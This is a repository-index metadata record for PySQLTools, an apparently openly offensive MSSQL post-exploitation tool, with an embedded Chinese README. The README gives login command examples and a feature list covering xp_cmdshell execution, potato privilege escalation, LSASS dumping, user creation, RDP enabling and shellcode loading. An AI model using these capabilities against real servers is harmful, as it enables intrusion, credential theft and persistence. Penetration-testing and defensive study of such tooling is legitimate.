{"id":13845186,"url":"https://github.com/Ridter/PySQLTools","last_synced_at":"2025-07-12T01:31:57.138Z","repository":{"id":63554028,"uuid":"568624544","full_name":"Ridter/PySQLTools","owner":"Ridter","description":"Mssql利用工具","archived":false,"fork":false,"pushed_at":"2023-08-07T05:03:37.000Z","size":405,"stargazers_count":267,"open_issues_count":0,"forks_count":33,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-05-20T14:06:28.812Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Ridter.png","metadata":{"files":{"readme":"README.MD","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2022-11-21T03:44:33.000Z","updated_at":"2025-05-15T10:46:54.000Z","dependencies_parsed_at":"2024-02-21T10:19:30.834Z","dependency_job_id":"d55f86a7-4436-401a-bd3d-47738a9d2066","html_url":"https://github.com/Ridter/PySQLTools","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Ridter/PySQLTools","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ridter%2FPySQLTools","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ridter%2FPySQLTools/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ridter%2FPySQLTools/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ridter%2FPySQLTools/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ridter","download_url":"https://codeload.github.com/Ridter/PySQLTools/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ridter%2FPySQLTools/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264923076,"owners_count":23683716,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:03:15.536Z","updated_at":"2025-07-12T01:31:56.724Z","avatar_url":"https://github.com/Ridter.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# PySQLTools\n\n[SharpSQLTools](https://github.com/uknowsec/SharpSQLTools) Python版本，方便在没windows机器或代理场景下使用。\n\n\u003e对于Link相关操作没做相关测试。有问题可以提Issue。\n\n## 使用\n支持Windows及密码认证 😊\n\nWindows认证方式为：\n```\npython PySQLTools.py localhost/administrator:'password'@10.211.55.251 -windows-auth -debug\n```\n\n账号密码认证方式为：\n```\npython PySQLTools.py sa:'password'@10.211.55.251\n```\n\n如果碰到以下错误:\n```\n[-] [('SSL routines', '', 'unsafe legacy renegotiation disabled')]\n```\n\n可添加OPENSSL配置文件来加载，如：\n```\nOPENSSL_CONF=openssl.conf python PySQLTools.py sa:'password'@10.211.55.251\n```\n\n支持功能如下:\n\n```\nenable_xp_cmdshell            - you know what it means\ndisable_xp_cmdshell           - you know what it means\nxp_cmdshell {cmd}             - executes cmd using xp_cmdshell\nsp_oacreate {cmd}             - executes cmd using sp_oacreate\nxp_dirtree {path}             - executes xp_dirtree on the path\nsp_start_job {cmd}            - executes cmd using the sql server agent (blind)\nenable_ole                    - you know what it means\ndisable_ole                   - you know what it means\nupload {local} {remote}       - upload a local file to a remote path (OLE required)\ndownload {remote} {local}     - download a remote file to a local path (OLE required)\nenable_clr                    - you know what it means\ndisable_clr                   - you know what it means\ninstall_clr                   - create assembly and procedure\nuninstall_clr                 - drop clr\nclr_pwd                       - print current directory by clr\nclr_ls {directory}            - list files by clr\nclr_cd {directory}            - change directory by clr\nclr_ps                        - list process by clr\nclr_netstat                   - netstat by clr\nclr_ping {host}               - ping by clr\nclr_cat {file}                - view file contents by clr\nclr_rm {file}                 - delete file by clr\nclr_exec {cmd}                - for example: clr_exec whoami;clr_exec -p c:.exe;clr_exec -p c:\\cmd.exe -a /c whoami\nclr_efspotato {cmd}           - exec by EfsPotato like clr_exec\nclr_badpotato {cmd}           - exec by BadPotato like clr_exec\nclr_godpotato {cmd}           - exec by GodPotato like clr_exec\nclr_combine {remotefile}      - When the upload module cannot call CMD to perform copy to merge files\nclr_dumplsass {path}          - dumplsass by clr\nclr_rdp                       - check RDP port and Enable RDP\nclr_getav                     - get anti-virus software on this machin by clr\nclr_adduser {user} {pass}     - add user by clr\nclr_download {url} {path}     - download file from url by clr\nclr_scloader {shellcode}      - shellcode.bin\nclr_assembly {prog} {args}    - execute-assembly.\nclr_assembly_sc {shellcode}   - assembly shellcode created by donut.\nuse_link {link}               - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)\nenum_db                       - enum databases\nenum_links                    - enum linked servers\nenum_impersonate              - check logins that can be impersonate\nenum_logins                   - enum login users\nenum_users                    - enum current db users\nenum_owner                    - enum db owner\nexec_as_user {user}           - impersonate with execute as user\nexec_as_login {login}         - impersonate with execute as login\n! {cmd}                       - executes a local shell cmd\nshow_query                    - show query\nmask_query                    - mask query\n```\n\n## 更新\n2023/07/27\n\n添加了执行assembly的功能，通过加载shellcode的方式实现，在linux上可完美运行：\n\n![](assets/20230727172738.png)\n\n在其他平台上，需要使用docker的[donut](https://github.com/TheWover/donut)生成shellcode，在使用`clr_assembly_sc`进行加载执行。\n\n## CLR\nCLR源码见:[MSSQL_CLR](https://github.com/Ridter/MSSQL_CLR)\n## 参考：\n\n```\n1、https://github.com/uknowsec/SharpSQLTools\n2、https://github.com/ShutdownRepo/impacket/blob/getST/examples/mssqlclient.py\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FRidter%2FPySQLTools","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FRidter%2FPySQLTools","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FRidter%2FPySQLTools/lists"}